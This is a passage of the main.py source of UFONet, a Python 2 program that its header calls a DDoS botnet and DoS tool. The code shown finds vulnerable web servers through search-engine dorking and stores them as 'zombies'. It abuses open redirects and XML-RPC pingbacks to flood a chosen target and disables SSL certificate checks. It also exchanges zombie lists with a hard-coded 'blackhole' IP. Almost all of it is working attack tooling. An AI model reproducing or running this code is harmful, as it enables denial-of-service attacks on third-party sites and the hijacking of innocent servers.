main.py 147 KB


 1. #!/usr/bin/env python
 2. # -*- coding: utf-8 -*-"
 3. """
 4. UFONet - (DDoS botnet + DoS tool) via Web Abuse - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net)
 5. You should have received a copy of the GNU General Public License along
 6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
 7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 8. """
 9. import os, sys, re, traceback, random, time, threading, base64, socket, httplib, ssl, string
 10. import StringIO, urllib, urllib2, cgi, json
 11. from urlparse import urlparse
 12. from random import randrange, shuffle
 13. from options import UFONetOptions
 14. from update import Updater
 15. from herd import Herd
 16. from zombie import Zombie
 17. from doll import Doll
 18. from inspector import Inspector
 19. from abductor import Abductor
 20. from loic import LOIC
 21. from loris import LORIS
 22. DEBUG = 0
 23. class UFONet(object):
 24. def __init__(self):
 25. self.blackhole = '176.28.23.46' # default download/upload zombies 'blackhole'
 26. self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
 27. self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
 28. self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve 'zombies'
 29. self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve 'aliens'
 30. self.droids_file = 'botnet/droids.txt' # set source path to retrieve 'droids'
 31. self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs'
 32. self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs'
 33. self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans'
 34. self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve 'dorks'
 35. self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
 36. self.referer = 'http://127.0.0.1/'
 37. self.head = False
 38. self.payload = False
 39. self.external = False
 40. self.attack_mode = False
 41. self.retries = ''
 42. self.delay = ''
 43. self.connection_failed = False
 44. self.total_possible_zombies = 0
 45. self.herd = Herd(self)
 46. self.sem = False
 47. self.port = "8080" # default UFONet injection port
 48. self.db_flash = 0 # db stress counter
 49. self.total_aliens = 0
 50. self.aliens_hit = 0
 51. self.aliens_fail = 0
 52. self.total_droids = 0
 53. self.droids_hit = 0
 54. self.droids_fail = 0
 55. self.total_ucavs = 0
 56. self.ucavs_hit = 0
 57. self.ucavs_fail = 0
 58. self.total_rpcs = 0
 59. self.rpcs_hit = 0
 60. self.rpcs_fail = 0
 61. self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic)
 62. self.ctx.check_hostname = False
 63. self.ctx.verify_mode = ssl.CERT_NONE
 64. self.nat_error_flag = "OFF"
 65. self.trans_zombies = 0
 66. self.scanned_zombies = 0
 67. def create_options(self, args=None):
 68. self.optionParser = UFONetOptions()
 69. self.options = self.optionParser.get_options(args)
 70. if not self.options:
 71. return False
 72. return self.options
 73. def banner_welcome(self):
 74. print " 0===============================================0"
 75. print " '' '----' '' || ||"
 76. print " .'_.- ( ) -._'. || * Botnet -> DDoS: ||"
 77. print " .'.' |'..'| '.'. || ||"
 78. print " .-. .' /'--.__|____|__.--'\ '. .-. || -Zombies : HTTP GET bots ||"
 79. print " (O).)-| | \ * | |* / | |-(.(O) || -Droids : HTTP GET (+params) bots ||"
 80. print " `-' '-'-._'-./ \.-'_.-'-' `-' || -Aliens : HTTP POST bots ||"
 81. print " _ | | '-.________.-' | | _ || -UCAVs : Web Abusing bots ||"
 82. print " .' _ | | | __ | | | _ '. || -X-RPCs : XML-RPC bots ||"
 83. print " / .' ''.| | /____\ | |.'' '. \ || ||"
 84. print " | |( )| '. ||_____ || .' |( )| | || * Close Combat -> DoS: ||"
 85. print " \ '._.' '. | \____/ | .' '._.' / || ||"
 86. print " '.__ ______'.|__'--'__|.'______ __.' || -LOIC : Fast HTTP requests ||"
 87. print " .'_.-| |-._'. || -LORIS : Slow HTTP requests ||"
 88. print " || ||"
 89. print " * Class: UFONet - ViPR404 (model B)- || * Featured: Crawler, +CVE, +WAF detection ||"
 90. print " * Type: /Scout/Transporter/Warfare/ || ||"
 91. print " 0|=============================================|0"
 92. print ""
 93. def banner(self):
 94. print '='*75, "\n"
 95. print "888 888 8888888888 .d88888b. 888b 888 888 "
 96. print "888 888 888 d88P Y888b 8888b 888 888 "
 97. print "888 888 888 888 888 88888b 888 888 "
 98. print "888 888 8888888 888 888 888Y88b 888 .d88b. 888888 "
 99. print "888 888 888 888 888 888 Y88b888 d8P Y8b 888 "
 100. print "888 888 888 888 888 888 Y88888 88888888 888 "
 101. print "Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. "
 102. print " 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888"
 103. print self.optionParser.description, "\n"
 104. print '='*75
 105. def try_running(self, func, error, args=None):
 106. options = self.options
 107. args = args or []
 108. try:
 109. return func(*args)
 110. except Exception as e:
 111. print(error, "error")
 112. if DEBUG:
 113. traceback.print_exc()
 114. def start_ship_engine(self):
 115. self.agents = [] # generating available user-agents
 116. f = open(self.agents_file)
 117. agents = f.readlines()
 118. f.close()
 119. for agent in agents:
 120. self.agents.append(agent)
 121. self.user_agent = random.choice(self.agents).strip()
 122. self.search_engines = [] # available dorking search engines
 123. self.search_engines.append('bing') # [03/02/2018: OK!]
 124. self.search_engines.append('yahoo') # [03/02/2018: OK!]
 125. #self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
 126. #self.search_engines.append('duck') [09/08/2016: deprecated! -> duck has removed 'inurl' operator]
 127. #self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
 128. if not os.path.exists("core/json/"): # create gui json cfg files folder
 129. os.mkdir("core/json/")
 130. self.banner_welcome()
 131. self.update_flying_stats() # update flying time stats
 132. chargo = self.check_mothership_chargo() # check mothership chargo
 133. self.update_max_chargo(int(chargo)) # update max chargo stats
 134. def run(self, opts=None):
 135. if opts:
 136. self.create_options(opts)
 137. options = self.options
 138. # start threads
 139. if not self.options.threads:
 140. self.options.threads=5 # default number of threads
 141. self.sem = threading.Semaphore(self.options.threads)
 142. # start ship engine
 143. self.start_ship_engine()
 144. # check proxy options
 145. proxy = options.proxy
 146. if options.proxy:
 147. try:
 148. pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
 149. m = re.search(pattern, proxy)
 150. if m is None:
 151. self.banner()
 152. print ("\n[Error] - Proxy malformed!\n")
 153. return #sys.exit(2)
 154. except Exception:
 155. self.banner()
 156. print ("\n[Error] - Proxy malformed!\n")
 157. return #sys.exit(2)
 158. # check tor connection
 159. if options.checktor:
 160. url = 'https://check.torproject.org' # TOR status checking site
 161. self.banner()
 162. print "\nSending request to: " + url + "\n"
 163. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 164. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 165. try:
 166. if options.proxy: # set proxy
 167. self.proxy_transport(options.proxy)
 168. req = urllib2.Request(url, None, headers)
 169. tor_reply = urllib2.urlopen(req).read()
 170. else:
 171. req = urllib2.Request(url, None, headers)
 172. tor_reply = urllib2.urlopen(req, context=self.ctx).read()
 173. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
 174. if not tor_reply or 'Congratulations' not in tor_reply:
 175. print("It seems that Tor is not properly set.\n")
 176. print("Your IP address appears to be: " + your_ip + "\n")
 177. else:
 178. print("Congratulations!. Tor is properly being used :-)\n")
 179. print("Your IP address appears to be: " + your_ip + "\n")
 180. except:
 181. print("Cannot reach TOR checker system!. Are you correctly connected?\n")
 182. sys.exit(2) # return
 183. # run AES256+HMAC-SHA1 enc/dec tool
 184. if options.cryptomsg:
 185. from server.crypter import Cipher
 186. from base64 import b64encode, b64decode
 187. print " "
 188. print " ____...------------...____ "
 189. print " _.-'' /o/__ ____ __ __ __ \o\_`'-._ "
 190. print " .' / / \ \ '. "
 191. print " |=====/o/======================\o\=====| "
 192. print " |____/_/________..____..________\_\____| "
 193. print " / _/ \_ <_o#\__/#o_> _/ \_ \ "
 194. print " \__/_____\####/__________/####/_____\__/ "
 195. print " |===\!/========================\!/===| "
 196. print " | |=| .---. |=| | "
 197. print " |===|o|=========/ \========|o|===| "
 198. print " | | | \() ()/ | | | "
 199. print " |===|o|======{'-.) A (.-'}=====|o|===| "
 200. print " | __/ \__ '-.\uuu/.-' __/ \__ | "
 201. print " |==== .'.'^'.'.====|====.'.'^'.'.====| "
 202. print " | _\o/ __ {.' __ '.} _ _\o/ _| "
 203. print " '''''''''''''''''''''''''''''''''''''' "
 204. print "\nUFONet Crypter (AES256+HMAC-SHA1)\n"
 205. print " -> (140 plain text chars = 69 encrypted chars)\n"
 206. text = str(raw_input("- Enter text: "))
 207. input_key = str(raw_input("- Enter key: "))
 208. key = b64encode(input_key)
 209. c = Cipher(key, text)
 210. msg = c.encrypt()
 211. c.set_text(msg)
 212. print '\n-> Ciphertext: [', msg, ']'
 213. print '\nLength:', len(msg)
 214. print '\n-> Key (share it using SNEAKNET!):', input_key
 215. print '\nDecryption PoC:', c.decrypt(), "\n"
 216. # search for 'zombies' on search engines results (dorking)
 217. if options.search:
 218. zombies = []
 219. if options.engine:
 220. engine = options.engine
 221. else:
 222. engine = "yahoo" # default search engine
 223. try:
 224. self.banner()
 225. if not os.path.exists(self.humans_file) == True:
 226. f = open(self.humans_file, 'w')
 227. f.close()
 228. lf = open(self.humans_file, 'r')
 229. restored = lf.readlines()
 230. zombies_restored = len(restored)
 231. lf.close()
 232. lz = open(self.zombies_file, 'r')
 233. zombies_army = lz.readlines()
 234. for zombie in zombies_army:
 235. zombies.append(zombie) # add zombies from army to the zombies pool
 236. lz.close()
 237. if len(restored) > 0:
 238. print "\n[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 239. if not self.options.forceyes:
 240. backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 241. print '-'*25
 242. else:
 243. backup_reply = "Y"
 244. if backup_reply == "n" or backup_reply == "N":
 245. print "\n[Info] Removing data stored and starting a new search...\n"
 246. os.remove(self.humans_file)
 247. zombies_restored = 0 # flush zombies restored
 248. print '-'*25 + "\n"
 249. else:
 250. print "\n[Info] Restoring data and starting a new search...\n"
 251. print '-'*25 + "\n"
 252. for zombie in restored:
 253. zombies.append(zombie) # add previous data to zombies pool
 254. if options.allengines:
 255. for e in self.search_engines:
 256. engine = e
 257. print '='*44
 258. print("\nSearching for zombies (with AI mode) using: "+engine+'\n')
 259. print '='*44 + '\n'
 260. self.options.engine = engine
 261. try:
 262. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
 263. if zombies_chain != None:
 264. for zombie in zombies_chain:
 265. if zombie not in zombies: # evade possible repetitions
 266. zombies.append(zombie)
 267. except:
 268. if zombies: # backup all new zombies found to file in case of exception
 269. for zombie in zombies:
 270. if zombie+os.linesep not in restored: # only append new zombies found
 271. with open(self.humans_file, "a") as f:
 272. f.write(str(zombie+os.linesep))
 273. else:
 274. if restored:
 275. print '='*44
 276. print("\nSearching for zombies (with AI mode) using: "+engine+"\n")
 277. print '='*44 + '\n'
 278. if restored: # from restored file
 279. try:
 280. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
 281. if zombies_chain != None:
 282. for zombie in zombies_chain:
 283. if zombie not in zombies: # evade possible repetitions
 284. zombies.append(zombie)
 285. except:
 286. if zombies: # backup all new zombies found to file in case of exception
 287. for zombie in zombies:
 288. if zombie+os.linesep not in restored: # only append new zombies found
 289. with open(self.humans_file, "a") as f:
 290. f.write(str(zombie+os.linesep))
 291. else:
 292. try:
 293. zombies = self.search_zombies(dork='', zombies_found=zombies)
 294. except:
 295. if zombies: # backup all new zombies found to file in case of exception
 296. for zombie in zombies:
 297. if zombie+os.linesep not in restored: # only append new zombies found
 298. with open(self.humans_file, "a") as f:
 299. f.write(str(zombie+os.linesep))
 300. total_restored = zombies_restored
 301. new_zombies = 0 # new zombies counter
 302. f = open(self.zombies_file, 'r')
 303. zz = f.readlines()
 304. f.close()
 305. zombies_found = []
 306. for z in zombies:
 307. if z.endswith(os.linesep):
 308. z = z.replace(os.linesep, "")
 309. if z not in zz and z+os.linesep not in zz:
 310. new_zombies = new_zombies + 1
 311. zombies_found.append(z)
 312. print '='*62
 313. print "\n- Victims found:", len(zombies_found), "\n"
 314. print " - Restored:", total_restored
 315. print " - Dorked:", len(zombies_found) - total_restored, "\n"
 316. print '-'*32
 317. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 318. print '='*62 + '\n'
 319. if len(zombies) > 0:
 320. if not self.options.forceyes:
 321. check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n")
 322. print '-'*25
 323. else:
 324. check_backup_reply = "Y"
 325. if check_backup_reply == "n" or check_backup_reply == "N":
 326. if os.path.isfile(self.humans_file):
 327. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 328. print "\n[Info] Temporal data correctly removed...\n"
 329. else:
 330. with open(self.humans_file, "w") as f:
 331. for z in zombies_found:
 332. if z.endswith(os.linesep):
 333. z = z.replace(os.linesep, "")
 334. if z not in zz or z+os.linesep not in zz:
 335. f.write(z+os.linesep)
 336. f.close()
 337. print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n"
 338. print '-'*25 + "\n"
 339. if new_zombies and new_zombies > 0:
 340. if not self.options.forceyes:
 341. check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n")
 342. print '-'*25 + "\n"
 343. else:
 344. check_url_link_reply = "Y"
 345. if check_url_link_reply == "n" or check_url_link_reply == "N":
 346. print "Bye!\n"
 347. pass
 348. else:
 349. print "\n" + '='*44
 350. test = self.testing(zombies_found)
 351. else:
 352. print "[Info] NOT any NEW possible zombies found... Exiting!\n"
 353. except Exception:
 354. print ("\n[Error] - Something wrong searching using: "+engine+"\n")
 355. # search for 'zombies' from a list of 'dorks'
 356. if options.dorks:
 357. if options.engine:
 358. engine = options.engine
 359. else:
 360. engine = "yahoo" # default search engine
 361. try:
 362. dorks = self.extract_dorks()
 363. if not dorks:
 364. return
 365. zombies = []
 366. self.banner()
 367. if not os.path.exists(self.humans_file) == True:
 368. f = open(self.humans_file, 'w')
 369. f.close()
 370. lf = open(self.humans_file, 'r')
 371. restored = lf.readlines()
 372. zombies_restored = len(restored)
 373. lf.close()
 374. lz = open(self.zombies_file, 'r')
 375. zombies_army = lz.readlines()
 376. for zombie in zombies_army:
 377. zombies.append(zombie) # add zombies from army to the zombies pool
 378. lz.close()
 379. if len(restored) > 0:
 380. print "\n[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 381. if not self.options.forceyes:
 382. backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 383. print '-'*25
 384. else:
 385. backup_reply = "Y"
 386. if backup_reply == "n" or backup_reply == "N":
 387. print "\n[Info] Removing data stored and starting a new search...\n"
 388. os.remove(self.humans_file)
 389. zombies_restored = 0 # flush zombies restored
 390. print '-'*25 + "\n"
 391. else:
 392. print "\n[Info] Restoring data and starting a new search...\n"
 393. print '-'*25 + "\n"
 394. for zombie in restored:
 395. zombies.append(zombie) # add previous data to zombies pool
 396. total_restored = zombies_restored
 397. if options.allengines:
 398. for e in self.search_engines:
 399. engine = e
 400. print '='*44
 401. print("\nSearching for zombies (with AI mode) using: "+engine+ " [from a list of 'dorks']\n")
 402. print '='*44 + '\n'
 403. self.options.engine = engine
 404. for dork in dorks:
 405. print '='*22
 406. print "Dork:", dork
 407. print '='*22 + '\n'
 408. try:
 409. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
 410. for zombie in dorked_zombies:
 411. if zombie not in zombies: # evade repetitions for zombies found
 412. zombies.append(zombie)
 413. if zombie+os.linesep not in restored: # only append new zombies found
 414. with open(self.humans_file, "a") as f:
 415. f.write(str(zombie+os.linesep))
 416. f.close()
 417. except:
 418. if zombies: # backup new zombies found on exception
 419. for zombie in zombies:
 420. if zombie+os.linesep not in restored: # only append new zombies found
 421. with open(self.humans_file, "a") as f:
 422. f.write(str(zombie+os.linesep))
 423. f.close()
 424. else:
 425. if restored:
 426. print '='*44
 427. print("\nSearching for zombies (with AI mode) using: "+engine+ " [from a list of 'dorks']\n")
 428. print '='*44 + '\n'
 429. for dork in dorks:
 430. print '='*22
 431. print "Dork:", dork
 432. print '='*22 + '\n'
 433. try:
 434. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
 435. if dorked_zombies != None:
 436. for zombie in dorked_zombies:
 437. if zombie not in zombies: # evade repetitions for zombies found
 438. zombies.append(zombie)
 439. except:
 440. if zombies: # backup new zombies found on exception
 441. for zombie in zombies:
 442. if zombie+os.linesep not in restored: # only append new zombies found
 443. with open(self.humans_file, "a") as f:
 444. f.write(str(zombie+os.linesep))
 445. f.close()
 446. new_zombies = 0 # new zombies counter
 447. f = open(self.zombies_file, 'r')
 448. zz = f.readlines()
 449. f.close()
 450. zombies_found = []
 451. for z in zombies:
 452. if z.endswith(os.linesep):
 453. z = z.replace(os.linesep, "")
 454. if z not in zz and z+os.linesep not in zz:
 455. new_zombies = new_zombies + 1
 456. zombies_found.append(z)
 457. print '='*62
 458. print "\n- Victims found:", len(zombies_found), "\n"
 459. print " - Restored:", total_restored
 460. print " - Dorked:", len(zombies_found) - total_restored, "\n"
 461. print '-'*32
 462. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 463. print '='*62 + '\n'
 464. if len(zombies_found) > 0:
 465. if not self.options.forceyes:
 466. check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n")
 467. print '-'*25
 468. else:
 469. check_backup_reply = "Y"
 470. if check_backup_reply == "n" or check_backup_reply == "N":
 471. if os.path.isfile(self.humans_file):
 472. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 473. print "\n[Info] Temporal data correctly removed...\n"
 474. else:
 475. with open(self.humans_file, "w") as f:
 476. for z in zombies_found:
 477. if z.endswith(os.linesep):
 478. z = z.replace(os.linesep, "")
 479. if z not in zz or z+os.linesep not in zz:
 480. f.write(z+os.linesep)
 481. f.close()
 482. print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n"
 483. print '-'*25 + "\n"
 484. if new_zombies and new_zombies > 0:
 485. if not self.options.forceyes:
 486. check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n")
 487. print '-'*25 + "\n"
 488. else:
 489. check_url_link_reply = "Y"
 490. if check_url_link_reply == "n" or check_url_link_reply == "N":
 491. print "Bye!\n"
 492. pass
 493. else:
 494. print "\n" + '='*44
 495. test = self.testing(zombies_found)
 496. else:
 497. print "[Info] NOT any NEW possible zombies found... Exiting!\n"
 498. except Exception:
 499. print ("\n[Error] - Something wrong searching using: "+engine+"\n")
 500. # auto-search for 'zombies' (dorks+all_engines+time -> to discover max new zombies)
 501. if options.autosearch:
 502. try:
 503. dorks = self.extract_dorks()
 504. except:
 505. print "\n[Info] Not any dork present at: 'botnet/dorks.txt'. Aborting!\n"
 506. return
 507. engines_list = self.search_engines
 508. stop_flag = False # use a flag to establish an end
 509. try:
 510. self.banner()
 511. print "\nSearching automatically for 'zombies' (WARNING: this may take several time!)\n"
 512. print "[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n"
 513. print '-'*25 + "\n"
 514. zombies_found = []
 515. lz = open(self.zombies_file, 'r')
 516. zombies_army = lz.readlines()
 517. for zombie in zombies_army:
 518. zombies_found.append(zombie) # add zombies from army to the zombies found pool
 519. lz.close()
 520. if not os.path.exists(self.humans_file) == True:
 521. f = open(self.humans_file, 'w')
 522. f.close()
 523. lf = open(self.humans_file, 'r')
 524. restored = lf.readlines()
 525. zombies_restored = len(restored)
 526. lf.close()
 527. if len(restored) > 0:
 528. print "[Info] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n"
 529. if not self.options.forceyes:
 530. backup_reply = raw_input("Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
 531. print '-'*25
 532. else:
 533. backup_reply = "Y"
 534. if backup_reply == "n" or backup_reply == "N":
 535. print "\n[Info] Removing data stored and starting a new (auto)search...\n"
 536. os.remove(self.humans_file)
 537. zombies_restored = 0 # flush zombies restored
 538. print '-'*25 + "\n"
 539. else:
 540. print "\n[Info] Restoring data and starting a new (auto)search...\n"
 541. print '-'*25 + "\n"
 542. for zombie in restored:
 543. zombies_found.append(zombie) # add previous data to zombies found pool
 544. total_restored = zombies_restored
 545. while stop_flag == False:
 546. if not os.path.exists(self.humans_file) == True:
 547. f = open(self.humans_file, 'w')
 548. f.close()
 549. lf = open(self.humans_file, 'r') # read it on each iteration to update changes
 550. restored = lf.readlines()
 551. lf.close()
 552. zombies_restored = len(restored)
 553. for e in engines_list:
 554. zombies_counter = 0 # use it also as (engine) flag
 555. engine = e
 556. self.options.engine = engine
 557. print '='*44 + '\n'
 558. print("Searching for zombies (with AI mode) using: "+engine+'\n')
 559. print '='*44 + '\n'
 560. for dork in dorks:
 561. print '='*22
 562. print "Dork:", dork
 563. print '='*22 + '\n'
 564. try:
 565. dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode
 566. for zombie in dorked_zombies:
 567. if zombie not in zombies_found: # evade repetitions for zombies found
 568. zombies_found.append(zombie)
 569. if zombie+os.linesep not in restored: # only append new zombies found
 570. with open(self.humans_file, "a") as f:
 571. f.write(str(zombie+os.linesep))
 572. f.close()
 573. zombies_counter = zombies_counter + 1
 574. except:
 575. if zombies_found: # backup new zombies found on exception
 576. for zombie in zombies_found:
 577. if zombie+os.linesep not in restored: # only append new zombies found
 578. with open(self.humans_file, "a") as f:
 579. f.write(str(zombie+os.linesep))
 580. f.close()
 581. if zombies_counter == 0:
 582. print "[Info] - NOT more NEW victims found (by the moment) using: "+engine+"... Let's remove it from queue!\n"
 583. print '-'*25 + "\n"
 584. engines_list.remove(engine) # remove not more results engine from search engines list
 585. if not engines_list: # if search engines empty, call return-exit routine
 586. print "[Info] - Search engines aren't providing more results... Exiting! ;-)\n"
 587. print '-'*25 + "\n"
 588. stop_flag = True # exit flag up
 589. new_zombies = 0 # new zombies counter
 590. f = open(self.zombies_file, 'r')
 591. zz = f.readlines()
 592. f.close()
 593. all_zombies_found = []
 594. for z in zombies_found:
 595. if z.endswith(os.linesep):
 596. z = z.replace(os.linesep, "")
 597. if z not in zz and z+os.linesep not in zz:
 598. new_zombies = new_zombies + 1
 599. all_zombies_found.append(z)
 600. print '='*62
 601. print "\n- Victims found:", len(all_zombies_found), "\n"
 602. print " - Restored:", total_restored
 603. print " - Dorked:", len(all_zombies_found) - total_restored, "\n"
 604. print '-'*32
 605. print "\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n"
 606. print '='*62 + '\n'
 607. if len(zombies_found) > 0:
 608. if not self.options.forceyes:
 609. check_backup_reply = raw_input("Want to save results for a future search? (Y/n)\n")
 610. print '-'*25
 611. else:
 612. check_backup_reply = "Y"
 613. if check_backup_reply == "n" or check_backup_reply == "N":
 614. if os.path.isfile(self.humans_file):
 615. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
 616. print "\n[Info] Temporal data correctly removed...\n"
 617. else:
 618. with open(self.humans_file, "w") as f:
 619. for z in all_zombies_found:
 620. if z.endswith(os.linesep):
 621. z = z.replace(os.linesep, "")
 622. if z not in zz or z+os.linesep not in zz:
 623. f.write(z+os.linesep)
 624. f.close()
 625. print "\n[Info] Correctly saved at: 'botnet/humans.txt'\n"
 626. print '-'*25 + "\n"
 627. if new_zombies and new_zombies > 0:
 628. if not self.options.forceyes:
 629. check_url_link_reply = raw_input("Want to check if NEW possible zombies are valid? (Y/n)\n")
 630. print '-'*25 + "\n"
 631. else:
 632. check_url_link_reply = "Y"
 633. if check_url_link_reply == "n" or check_url_link_reply == "N":
 634. print "Bye!\n"
 635. pass
 636. else:
 637. print "\n" + '='*44
 638. test = self.testing(all_zombies_found)
 639. else:
 640. print "[Info] NOT any NEW possible zombies found... Exiting!\n"
 641. except Exception:
 642. print ("[Error] - Something wrong (auto)searching...\n")
 643. # test web 'zombie' servers -> show statistics
 644. if options.test:
 645. try:
 646. self.banner()
 647. zombies = self.extract_zombies()
 648. if not zombies:
 649. return
 650. test = self.testing(zombies)
 651. self.update_missions_stats() # update mothership missions stats
 652. except Exception:
 653. print ("\n[Error] - Something wrong testing!\n")
 654. traceback.print_exc()
 655. # test XML-'rpc' pingback vulnerable servers -> update list
 656. if options.testrpc:
 657. try:
 658. self.banner()
 659. rpcs = self.extract_rpcs()
 660. if not rpcs:
 661. return
 662. testrpc = self.testing_rpcs(rpcs)
 663. self.update_missions_stats() # update mothership missions stats
 664. except Exception:
 665. print ("\n[Error] - Something wrong testing XML-RPC servers!\n")
 666. traceback.print_exc()
 667. # check botnet searching for zombies offline
 668. if options.testoffline:
 669. try:
 670. self.banner()
 671. testbotnet = self.testing_offline()
 672. self.update_missions_stats() # update mothership missions stats
 673. except Exception:
 674. print ("\n[Error] - Something wrong checking for offline 'zombies'!\n")
 675. traceback.print_exc()
 676. # check ALL botnet status
 677. if options.testall:
 678. try:
 679. self.banner()
 680. test_all_botnet = self.testing_all()
 681. self.update_missions_stats() # update mothership missions stats
 682. except Exception:
 683. print ("\n[Error] - Something wrong testing ALL botnet status!\n")
 684. traceback.print_exc()
 685. # attack target -> exploit Open Redirect massively and conduct vulnerable servers to a target
 686. if options.target:
 687. try:
 688. self.banner()
 689. zombies = self.extract_zombies()
 690. if not zombies:
 691. return
 692. attack = self.attacking(zombies)
 693. self.update_missions_stats() # update mothership missions stats
 694. except Exception:
 695. print ("\n[Error] - Something wrong attacking!\n")
 696. traceback.print_exc()
 697. # inspect target -> inspect target's components sizes
 698. if options.inspect:
 699. try:
 700. self.banner()
 701. print("\nInspecting target to find the best place to attack... SSssh!\n")
 702. print '='*22 + '\n'
 703. self.instance = Inspector(self) # instance main class for inspection operations
 704. inspection = self.instance.inspecting(options.inspect)
 705. self.update_missions_stats() # update mothership missions stats
 706. except Exception, e:
 707. traceback.print_exc()
 708. print ("\n[Error] - Something wrong inspecting... Not any object found!\n")
 709. return #sys.exit(2)
 710. # abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.)
 711. if options.abduction:
 712. try:
 713. self.banner()
 714. print("\nAbducting target to extract interesting information... Be patient!\n")
 715. print '='*22 + '\n'
 716. self.instance = Abductor(self) # instance main class for abduction operations
 717. abduction = self.instance.abducting(options.abduction)
 718. self.update_missions_stats() # update mothership missions stats
 719. except Exception, e:
 720. traceback.print_exc()
 721. print ("\n[Error] - Something wrong abducting... Not any data stream found!\n")
 722. return #sys.exit(2)
 723. # attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking
 724. if options.attackme:
 725. try:
 726. self.banner()
 727. print("\nOrdering 'zombies' to attack you for benchmarking ;-)\n")
 728. print("[Warning] You are going to reveal your real IP to your zombies...\n")
 729. if not self.options.forceyes:
 730. update_reply = raw_input("Want to continue? (Y/n)")
 731. else:
 732. update_reply = "Y"
 733. if update_reply == "n" or update_reply == "N":
 734. print "\n[Info] Aborting 'Attack-Me' test... Bye!\n"
 735. return
 736. self.mothership_ids = [] # generating name/id for your mothership ;-)
 737. f = open(self.motherships_file)
 738. motherships = f.readlines()
 739. f.close()
 740. for ship in motherships:
 741. self.mothership_ids.append(base64.urlsafe_b64encode(ship))
 742. self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()))
 743. self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash
 744. print "\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash
 745. f = open("alien", "w") # generate random alien worker
 746. f.write(str(self.mothership_hash))
 747. f.close()
 748. print("\nChecking NAT/IP configuration:\n")
 749. nat = self.check_nat()
 750. if self.nat_error_flag == "ON":
 751. return
 752. zombies = self.extract_zombies()
 753. if not zombies:
 754. return
 755. attackme = self.attackme(zombies)
 756. self.update_missions_stats() # update mothership missions stats
 757. except Exception, e:
 758. traceback.print_exc()
 759. print ("\n[Error] - Something wrong redirecting 'zombies' against you...\n")
 760. return #sys.exit(2)
 761. # # crawl target -> crawl target's places
 762. # if options.crawl:
 763. # try:
 764. # self.banner()
 765. # print("\nCrawlering target's links to discover web structure...\n")
 766. # print '='*22 + '\n'
 767. # crawler = self.crawlering()
 768. # except Exception, e:
 769. # print ("[Error] - Something wrong crawlering!\n")
 770. # return #sys.exit(2)
 771. # check/update for latest stable version
 772. if options.update:
 773. self.banner()
 774. try:
 775. print("\nTrying to update automatically to the latest stable version\n")
 776. Updater()
 777. except:
 778. print("\nSomething was wrong!. To have working this feature, you should clone UFONet with:\n")
 779. print("$ git clone https://github.com/epsylon/ufonet\n")
 780. # launch GUI/Web interface
 781. if options.web:
 782. self.create_web_interface()
 783. return
 784. # generate 'blackhole' server to share 'zombies'
 785. if options.blackhole is not None:
 786. self.banner()
 787. try:
 788. blackhole_lib = os.path.abspath(os.path.join('..', 'server')) # add 'blackhole' lib
 789. sys.path.append(blackhole_lib)
 790. from server.blackhole import BlackHole
 791. print("\nInitiating void generation sequence...\n")
 792. print '='*22 + '\n'
 793. app = BlackHole()
 794. app.start()
 795. while True: time.sleep(1)
 796. except KeyboardInterrupt:
 797. print("\nTerminating void generation sequence...\n")
 798. app.collapse()
 799. except Exception, e:
 800. print "[Error] "+str(e)
 801. print("\nSomething was wrong generating 'blackhole'. Aborting...\n")
 802. # download list of 'zombies' from a 'blackhole' IP
 803. if options.dip is not None:
 804. options.download = True
 805. self.blackhole = options.dip
